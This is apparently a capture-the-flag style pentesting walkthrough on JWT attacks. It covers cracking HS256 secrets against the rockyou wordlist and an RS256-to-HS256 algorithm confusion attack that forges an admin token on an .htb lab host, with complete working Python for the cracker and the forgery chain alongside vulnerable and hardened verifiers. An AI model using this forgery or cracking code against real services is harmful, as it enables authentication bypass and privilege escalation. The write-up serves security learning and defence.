Pentesting JWT (JSON Web Tokens)


Last updated 6 months ago

Basic JWT Information Using JWT_TOOL

python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0XzQ1MzAiLCJpYXQiOjE3Mjk4ODYxNTR9.cCgbU50zeYpH0cUZ9ioFe9eaHqmXp6b2ffkpTJ5-zAg

Cracking JWT-Token using JWT-CRACKER

jwt-cracker -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0XzQ1MzAiLCJpYXQiOjE3Mjk4ODYxNTR9.cCgbU50zeYpH0cUZ9ioFe9eaHqmXp6b2ffkpTJ5-zAg -d /usr/share/wordlists/rockyou.txt
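Both steps above, decoding and dictionary cracking, fit in a few lines of standard-library Python. The script below is an added example written for this page (it is not from the original page, from jwt_tool or from jwt-cracker): it decodes the header and payload of the token shown above without verifying it, and then runs the same attack jwt-cracker runs, recomputing HMAC-SHA256 over header.payload for every candidate secret and comparing with the token's signature. The demo token signed with winter2024 and the six-word wordlist are constructed for the example; the secret of the page's own token is not known here, so that token is only decoded.

```python
import base64
import hashlib
import hmac
import json

# Token from the jwt_tool example above (HS256, payload {"username": "guest_4530", "iat": ...})
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJ1c2VybmFtZSI6Imd1ZXN0XzQ1MzAiLCJpYXQiOjE3Mjk4ODYxNTR9."
              "cCgbU50zeYpH0cUZ9ioFe9eaHqmXp6b2ffkpTJ5-zAg")

# Constructed stand-in for rockyou.txt
WORDLIST = ["123456", "password", "secret", "letmein", "qwerty", "winter2024"]


def b64url_decode(s):
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_jwt(token):
    """The 'basic information' step: header (note alg), claims and raw signature, no verification."""
    h, p, s = token.split(".")
    return {"header": json.loads(b64url_decode(h)),
            "payload": json.loads(b64url_decode(p)),
            "signature": b64url_decode(s)}


def hs256_sign(header_b64, payload_b64, secret):
    return hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()


def make_hs256_token(payload, secret):
    """Only used to build a demo token whose secret is known."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header}.{body}.{b64url_encode(hs256_sign(header, body, secret))}"


def crack_hs256(token, candidates):
    """Offline dictionary attack: recompute HMAC-SHA256 over header.payload for each
    candidate and compare with the token's signature. Returns the secret or None."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        raise ValueError("only HMAC (HS*) tokens can be cracked this way")
    target = b64url_decode(s)
    for cand in candidates:
        if hmac.compare_digest(hs256_sign(h, p, cand.encode()), target):
            return cand
    return None


def crack_hs256_file(token, path):
    """Stream a real wordlist; rockyou.txt is not valid UTF-8, hence latin-1."""
    with open(path, encoding="latin-1") as f:
        return crack_hs256(token, (line.rstrip("\r\n") for line in f))


if __name__ == "__main__":
    info = decode_jwt(PAGE_TOKEN)
    print("header: ", info["header"])
    print("payload:", info["payload"])
    demo = make_hs256_token({"username": "guest_4530"}, b"winter2024")
    print("demo secret:", crack_hs256(demo, WORDLIST))
    print("page token secret (tiny wordlist):", crack_hs256(PAGE_TOKEN, WORDLIST))
```

Two things worth keeping in mind: the attack is entirely offline, so the only thing that limits it is the wordlist and the key's entropy, and it applies only to HS* tokens; for RS256/ES256 tokens there is no secret to guess, which is why the next section takes a different route.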

Algorithm Confusion Attacks in JWT Token

When the public key is available on the web server (via a jwks.json file)

Algorithm confusion (also called key confusion) works when the server verifies a token with whatever algorithm the token's own header claims. The token here is signed with RS256, so the server holds an RSA public key for verification. If we change the header's alg to HS256 and sign the token with the bytes of that public key as the HMAC secret, a vulnerable server will feed the same public key bytes into HMAC-SHA256 and the signature will match.

The prerequisite is the public key itself: without its exact bytes the attack can never work, because we cannot produce a signature the server will compute identically.

In the screenshot below, I try to create a webhook and get a 403 Forbidden, so I will attempt an algorithm confusion attack to turn that into a 200 OK.

The problem is finding the public key on the server. Besides common locations such as /.well-known/jwks.json or /jwks.json, directory brute-forcing is the way to go; I use feroxbuster here.

Luckily I found the jwks.json file by directory brute-forcing (-W 0,57 filters out the responses with 0 or 57 words, which were the noise on this host):

feroxbuster -u http://webhooks-api-beta.cybermonday.htb/ -W 0,57

A JWKS entry does not contain a PEM; it gives the RSA modulus n and exponent e as base64url strings. I need to convert these into a proper PEM public key, sign the JWT with HS256 using that PEM as the secret, change the user role to admin, and then see whether I can access the /create/webhook endpoint.

For the conversion I use Python 3 with pycryptodome:

import base64
from Crypto.PublicKey import RSA  # pip install pycryptodome

# "e" and "n" are the values from the jwks.json entry. Both are base64url-encoded
# big-endian integers, so decode them with urlsafe_b64decode (add '=' padding if
# the JWKS value has none; this one already carries its "==").
e = int.from_bytes(base64.urlsafe_b64decode("AQAB"), 'big')  # 65537
n = int.from_bytes(base64.urlsafe_b64decode("pvezvAKCOgxwsiyV6PRJfGMul-WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP_8jJ7WA2gDa8oP3N2J8zFyadnrt2Xe59FdcLXTPxbbfFC0aTGkDIOPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn797IlIYr6Wqfc6ZPn1nsEhOrwO-qSD4Q24FVYeUxsn7pJ0oOWHPD-qtC5q3BR2M_SxBrxXh9vqcNBB3ZRRA0H0FDdV6Lp_8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhngysgHsq6yJYM82BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh16w=="), 'big')

key = RSA.construct((n, e))      # build the public key object from (n, e)
print(key.exportKey().decode())  # print it as PEM ("-----BEGIN PUBLIC KEY-----")

Evaluating RSA.construct((n, e)) in the interpreter shows the parsed key, which confirms that n decoded to a 2048-bit modulus and e to 65537:

RsaKey(n=21077705076198164110050345996612932810772518568443539050967722091376715840724373912088648727462840166356037836008797866810613752598694921174993091914759002593675145922598909469318911554819111261819241455997350276504601809923734199273292278943649872262588721789631926559440043091439126662856921713786579174831565901935033306650397146382742890508658151492282389201858268597532677527914866223650606412599907677018538379813464063685144477862245532615744296358390508702719361603975980307523385389095548127340792700450704825980888363887958403440479605178094454574416540689804276427673977731782835533403716740628865097430507, e=65537)


I save the printed PEM into a file (public-key). jwt.io has a "secret base64 encoded" option for HMAC secrets, so I base64-encode the file on a single line and paste the result as the secret:

 base64 public-key -w 0

Now I can sign the token on jwt.io: switch the algorithm to HS256, paste the encoded public key as the secret, and change the account role in the payload to admin. One caveat: the HMAC secret has to be byte-for-byte what the server hands to its JWT library, so if the forged token is rejected, retry with and without a trailing newline on the PEM (pycryptodome's exportKey() prints none, OpenSSL adds one).

Finally, it worked: I am not getting the 403 error anymore, which means the algorithm confusion attack succeeded and I can reach the webhook page.
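The whole chain from the jwks.json entry to a forged admin token, as an added example written for this page (it is not the author's code and not taken from any library): it rebuilds the same PEM the pycryptodome snippet above produces, but from the standard library only, forges an HS256 token keyed with the PEM bytes, and then shows two server-side verifiers, one that dispatches on the header's alg and accepts the forgery, and one with the algorithm pinned that rejects it. The n and e values are the ones from the jwks.json shown above; the "role" claim name, the 64-column PEM layout with a trailing newline, and the assumption that the target feeds exactly those PEM bytes to its JWT library are mine.

```python
import base64
import hashlib
import hmac
import json

# "n" and "e" copied from the jwks.json entry shown above (base64url big-endian integers)
JWK = {
    "e": "AQAB",
    "n": "pvezvAKCOgxwsiyV6PRJfGMul-WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP_8jJ7WA2gDa8oP3N2J8zFyadnrt2Xe59FdcLXTPxbbfFC0aTGkDIOPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn797IlIYr6Wqfc6ZPn1nsEhOrwO-qSD4Q24FVYeUxsn7pJ0oOWHPD-qtC5q3BR2M_SxBrxXh9vqcNBB3ZRRA0H0FDdV6Lp_8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhngysgHsq6yJYM82BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh16w==",
}
# DigestInfo prefix for SHA-256 in RSASSA-PKCS1-v1_5 (RFC 8017, section 9.2)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


# Minimal DER encoder: enough to rebuild the SubjectPublicKeyInfo the server most likely loaded
def _der(tag, body):
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        size = (n.bit_length() + 7) // 8
        length = bytes([0x80 | size]) + n.to_bytes(size, "big")
    return bytes([tag]) + length + body


def _der_int(i):
    b = i.to_bytes(max(1, (i.bit_length() + 7) // 8), "big")
    return _der(0x02, b"\x00" + b if b[0] & 0x80 else b)  # DER INTEGER is signed


def jwk_to_der(jwk):
    n = int.from_bytes(b64url_decode(jwk["n"]), "big")
    e = int.from_bytes(b64url_decode(jwk["e"]), "big")
    rsa_public_key = _der(0x30, _der_int(n) + _der_int(e))
    alg_id = _der(0x30, bytes.fromhex("06092a864886f70d010101") + b"\x05\x00")  # rsaEncryption, NULL
    return _der(0x30, alg_id + _der(0x03, b"\x00" + rsa_public_key))


def jwk_to_pem(jwk):
    """Same layout as 'openssl rsa -pubout': 64-column base64 and a trailing newline (assumed)."""
    b64 = base64.b64encode(jwk_to_der(jwk)).decode()
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"-----BEGIN PUBLIC KEY-----\n{body}\n-----END PUBLIC KEY-----\n"


def forge_hs256(payload, secret):
    """Attacker side: alg switched to HS256, MAC keyed with the public key bytes."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def rs256_verify(signing_input, sig, jwk):
    """RSASSA-PKCS1-v1_5 / SHA-256 verification using only the public key (n, e)."""
    n = int.from_bytes(b64url_decode(jwk["n"]), "big")
    e = int.from_bytes(b64url_decode(jwk["e"]), "big")
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    t = SHA256_DIGESTINFO + hashlib.sha256(signing_input).digest()
    return hmac.compare_digest(em, b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t)


def _parse(token):
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)).get("alg"), f"{h}.{p}".encode(), b64url_decode(s), p


def verify_vulnerable(token, jwk):
    """Server side as buggy deployments do it: trust the header's alg and hand the same
    key material (the public key PEM) to whichever algorithm the token names."""
    alg, signing_input, sig, p = _parse(token)
    if alg == "RS256":
        ok = rs256_verify(signing_input, sig, jwk)
    elif alg == "HS256":  # the bug: the public PEM, which the attacker also has, becomes the HMAC secret
        mac = hmac.new(jwk_to_pem(jwk).encode(), signing_input, hashlib.sha256).digest()
        ok = hmac.compare_digest(mac, sig)
    else:
        ok = False
    return json.loads(b64url_decode(p)) if ok else None


def verify_hardened(token, jwk):
    """Fix: the algorithm is pinned by the server; an RSA key is never used for HMAC."""
    alg, signing_input, sig, p = _parse(token)
    if alg != "RS256" or not rs256_verify(signing_input, sig, jwk):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    pem = jwk_to_pem(JWK)
    print(pem)
    # "role" is an assumed claim name; the page only says the role was changed to admin
    forged = forge_hs256({"username": "guest_4530", "role": "admin"}, pem.encode())
    print("forged token:", forged)
    print("vulnerable verifier accepts:", verify_vulnerable(forged, JWK))
    print("hardened verifier accepts:  ", verify_hardened(forged, JWK))
```

If the real target rejects the forged token, the usual reason is a byte mismatch in the secret rather than a patched server: try the PEM without the trailing newline, with different line wrapping, or the raw DER or the JWK JSON itself, depending on how the application stores its key. On the defensive side, pinning the algorithm server-side is the fix this example shows; current libraries add a second guard (PyJWT, for instance, refuses an HMAC key that looks like a PEM public key), and either one on its own is enough to stop the attack.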

https://jwt.io/
Screenshots referenced above (captions only):
  • Current JWT token does not allow creating a webhook
  • The token's algorithm is RS256
  • jwks.json found on the web server using feroxbuster
  • Contents of jwks.json, which contains the public key
  • Successfully completed the algorithm confusion attack